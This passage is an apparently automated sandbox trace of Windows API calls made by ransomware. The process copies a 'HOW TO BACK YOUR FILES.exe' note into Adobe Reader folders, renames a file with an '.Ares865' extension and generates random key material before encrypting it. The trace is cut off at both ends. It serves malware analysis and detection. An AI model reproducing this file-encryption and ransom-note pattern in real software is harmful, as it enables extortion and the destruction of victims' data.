hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0057.742] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode") returned 69 [0057.742] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode" [0057.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.886] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.886] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.887] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.887] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.887] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings" [0057.887] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.887] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0057.887] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings") returned 78 [0057.887] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings" [0057.887] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.887] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.892] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.892] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.892] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.892] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.892] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win" [0057.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0057.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0057.892] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win") returned 82 [0057.892] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win" [0057.892] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.892] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.901] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.901] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.901] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.901] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.901] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac" [0057.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0057.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0057.901] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac") returned 82 [0057.901] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac" [0057.901] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.901] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.912] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.912] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5405a340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5405a340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.912] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.912] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.913] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe" [0057.913] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.913] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0057.913] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe") returned 84 [0057.913] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe" [0057.913] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.913] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.920] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.920] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5405a340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5405a340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.920] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.920] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.920] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU" [0057.920] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0057.920] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0057.920] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU") returned 73 [0057.920] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU" [0057.920] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.920] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.952] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.952] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834dd660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540cc760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540cc760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.952] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.953] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv.Ares865") returned 97 [0057.953] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv.ares865"), dwFlags=0x1) returned 1 [0057.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0057.963] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=228416) returned 1 [0057.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0057.964] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0057.964] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0057.964] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0057.965] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0057.965] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0057.965] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x37f40, lpName=0x0) returned 0x164 [0057.967] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37f40) returned 0x420000 [0058.269] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0058.270] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.270] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.270] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0058.273] CloseHandle (hObject=0x164) returned 1 [0058.273] CloseHandle (hObject=0x120) returned 1 [0058.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x540cc760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x540cc760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.277] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.277] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x834dd660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x345f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="icudt26l.dat", cAlternateFileName="")) returned 1 [0058.277] lstrcmpiW (lpString1="icudt26l.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.277] lstrcmpiW (lpString1="icudt26l.dat", lpString2="aoldtz.exe") returned 1 [0058.277] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep" [0058.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0058.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0058.277] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep") returned 58 [0058.277] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep" [0058.277] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.277] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.285] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.285] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d5bd20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x543ec440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x543ec440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.285] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.286] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.286] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics" [0058.286] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0058.286] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0058.286] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics") returned 61 [0058.286] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics" [0058.286] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.286] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.296] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.296] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.296] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers" [0058.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0058.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0058.296] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers") returned 71 [0058.296] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 